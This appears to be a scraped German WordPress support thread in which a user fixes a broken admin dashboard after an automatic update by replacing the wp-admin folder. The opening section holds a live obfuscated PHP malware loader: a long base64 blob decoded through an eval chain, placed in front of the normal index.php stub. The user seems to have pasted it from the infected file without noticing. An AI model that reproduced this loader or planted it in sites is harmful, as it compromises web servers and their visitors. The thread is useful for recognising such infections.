5bDFvTUpFbzJ3MEwzcDBCZFRPdlZzQ1FkcEh3d3N1ZTFwbVYwZm13WnBSVG1ablR3UkNzeWZnaFBUZ29EeDdIalhhUmROYWgzd1NMWjlBa1ZURm9jalhzeWwxb01iQ1JubHdteEp6bVpURXd3bFpteFpjVG01bVFkTlllUDk2cVBKQ2hHODFRT05hQnlsRkxWcGZ2eWdETHltN1JuMWVHbW1hdWVOV3VIQ2F3MmdXa3k5M29TcEt3ZE4yUU9uN1JaVFNxUFRnTFlqRmxENGJCR29JS2IwQlJkTmFSeWwxb01KRW8ydzBMM3AwQmRUT3ZWc0NRZHBId3dzdWUxcG1WMGt6ZW5KencwSnpqMFptR205S1FkTkpCZUNsZEROYVJkcE92VnNDVjNsZ3Z5OWJ2ZGF4aDN3U0xkYmFqMXdHZW45andaOXB3d1R6bXh3eVR3c1ptRGJhdUd4N0hqWGFSZE5hcVBoWHNjcEZvM2pJUmNDbGRETmFSZE5hUmROYWgzd1NMWjlBa1ZURm9jalhzeWwxb01iQ1JubHdteEp6bVpURW1uOWV3ZGJhdUd4N0hqWGFSZE5hUmROYVJ5bDFvTUpFbzJ3MEwzcDBCZFRPdlZzQ1FkcEh3d3N1ZTFwbVYxcHptMVR5R213dVRadUNSeWYwdmNwRWhZd0lMeVRFb1Z3Z29ZeFhzY3BGbzNqSUJlQ2xkRE5hUmRwOUhqWGFSZE5hcVBoWHN5bEZMMlVJa0d4YXJiMEJSZE5hUmROYVJkcE92VnNDVjNsZ3Z5OWJ2ZGF4aDN3U0xkYmFqMXdHZW45andaOUhlMDlRR21tQ1JkVE9MMjlpcVBtSUtiMEJSZE5hUmMwbGRETmFSZHBPdlZzQ1YzbGd2eTlidmRheGgzd1NMZGJhajF3R2VuOWp3WjlSVG1ablR3UkNSZFRTa1ZUMW9NNUhMMjlpcVBtSUtiMEJSZE5hUnlsMW9NSkVvMncwTDNwMEJkVE92VnNDUWRwSHd3c3VlMXBtVjFUc2Vtd3p3d2pDUkhuYkJlQ2xkRE5hUmRwT3ZWc0NWM2xndnk5YnZkYXhoM3dTTGRiYWoxd0dlbjlqd1o5R1R3VHdteDVtbXhaS20wa1ptRGJhdUd4N0hqWGFSZE5haDN3U0xaOUFrVlRGb2NqWHN5bDFvTWJDUm5sd214SnptWlRFbTFsdVYxa1pteGd5UHdwWlR3UkNSeWtmTGNsZ0JlQ2xkRE5hUmRwT3ZWc0NWM2xndnk5YnZkYXhoM3dTTGRiYWoxd0dlbjlqd1o5ZW0wSkV3eHdHR21ra0duOWV3ZGJhdUR4N0hqWGFSZE5hc3lUZnZ5bmF6R3BPdlZzQ1YydzRrUHVYc3lsMW9NYklLYjBCUmROYVJ5Z01SZGZPdlZzQ1Yyd1NvTTVGQmRUT3ZWc0NCR3hhcmIwQlJkTmFSZE5hUmRwU2tWVDFvTTRhaDN3U0xaOWdvWXNGb0RheGgzd1NMZHg3SGpYYVJkTmFFajBCUmROYVJ5bDFvTUpFaDJKRm8ybVhzeWwxb01iSUtiMEJSZE5hUmNzZ3Zjd1NMRE54a3laMGhlQ2xkWTBsZE1rMUxNbDBxUDlXUmNzZ3Zjd1NMeGZnaFBUZ29EYXh2VnNDQlZDbGRETmFSZHBJa0ROWG9jc2drMTlVaFZUT3FkYURSU2FXcVlwWUVkNXRveXdZQkdsQXFHUkNSZFQxb01iSUJWQ2xkRE5hUmROYVJkTmFzeWZnaFBUZ29ETjlSZHNJTFBaWWtHOXRveXdZUk9DbGRETmFSZHA5a1BKQWtQZ01SZGZib013WVYyMWZ2eWxYQmRST0JkNWJMTW9JUjNsSVJEYmFzY3dTTGR4SXJiMEJSZE5hUmROYVJkTnhxeXdma3l3U1JIMGFSTWdVaFB2Z1EzcFdrU1I3SGpYYVJkTmFFUHdDbzJ3SWtETlhvY3NnazE5VWhWVE9xZGFEUlNhV2syZ01CR2xBcUdSQ1JkVDFvTWJJQlZDbGRETmFSZE5hUmROYXN5ZmdoUFRnb0ROOVJkc0lMUFpZa0c5WXFQaERLYjBCUmROYVJjMWdMY2xncVBoYUJjcFNrUHZFTFBaMGgyYVhSRHVYUU1sQW9TeE9vMnhEUWROeHZWc0NCR2c3SGpYYVJkTmFSZE5hUmRUWGtQWnhrVlJhekdORHZ5dzR2ZDlPbzN1REtiMEJSZE5hUmMxZ0xjbGdxUGhhQmNwU2tQdkVMUFowaDJhWFJEdVhRTUlBQkdsQXFHUkNSZFQxb01iSUJWQ2xkRE5hUmROYVJkTmFzeWZnaFBUZ29ETjlSZHMwa1ZmMFEySWZ2TVpBaDNzSW9jakRLYjBCUmROYVJjMWdMY2xncVBoYUJjcFNrUHZFTFBaMGgyYVhSRHVYUU1nT0xTeE9vMnhEUWROeHZWc0NCR2c3SGpYYVJkTmFSZE5hUmRUWGtQWnhrVlJhekdORHFQMWZrMm1GcmQxSWgyOVdST0NsZEROYVJkcDlrUEpBa1ZDbGRETmFSZE5hUmROYXN5ZmdoUFRnb0ROOVJkczBrVmYwUTJmMExQYkRLYjBCUmROYVJjMGxkWTBsZGEwQnpBND0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?><?php define("WP_USE_THEMES", true); require( dirname( __FILE__ ) . "/wp-blog-header.php" );

  Thread-Starter BBworx

  (@bbworx)

  Es hat geklappt. Ich erzähle kurz, was bei mir das Problem war und was letztendlich die Lösung war. (Finde es immer schade, wenn Leute nur schreiben. Problem gelöst 🙂 )
  Nach vielem ausprobieren in Bezug auf die .htacess und überprüfung der Rechte der Dateien auf dem Server, Deaktivieren der Plugins und wecheseln des Templates war ich nahezu verzweifelt.
  Letztendlich habe ich die wp-admin Seite in googlechrome untersucht und er zeigte mir Fehler in der wp-admin…… an – u.a. ein Codeschnipsel der auf die aktuelle Version von WP hinwies. Nach dem letzten automatischen Update ging auch nichts mehr.
  Dann habe ich mir folgenden Leitfaden zu Rate gezogen: https://pixolin.de/alte-wordpress-installation-manuell-aktualisieren/

  Allerdings habe ich nur (nach sicherung aller Daten) den Ordner wp-admin durch den aktuellen frisch heruntergeladenen ersetzt.

  Zack fertig geht wieder. Also hat er sich wohl während des automatischen Updates verschluckt.

  Danke für die Hilfeversuche von @pixolin

  Thread-Starter BBworx

  (@bbworx)

  Das ganze ist anscheinend nach einem automatischen Update von WP passiert.
  leider komme ich auch nach dem Umbenennen des plugin Ordners nicht mehr ins Dashboard. Und natürlich ist jetzt die Seite auch zerschossen 🙁
  Die Plugins habe ich nachdem das ganze passiert ist über MainWP fern aktualisiert. Hat leider auch nichts gebracht.
  Ich wäre so dankbar für einen Denk Anstoss
  Vielen vielen Dank

  Thread-Starter BBworx

  (@bbworx)

  Zur Zeit sind sie aktiviert.
  Ich habe den Plugin Ordner umbenannt. Jetzt habe ich den ordner umbenannt.

  Thread-Starter BBworx

  (@bbworx)

  Hi Bego,
  danke für die schnelle Antwort.
  In der htaccess steht folgendes:
  <IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteBase /
  RewriteRule ^index.php$ – [L]
  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteRule . index.php [L]
  </IfModule>

  Diese habe ich auch schon versucht zu löschen etc.
  Inkognito habe ich versucht.

  Falls zugangsdaten helfen, bin ich da offen 🙂
  Weiß wirklich nicht weiter
  VG
  Benny

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)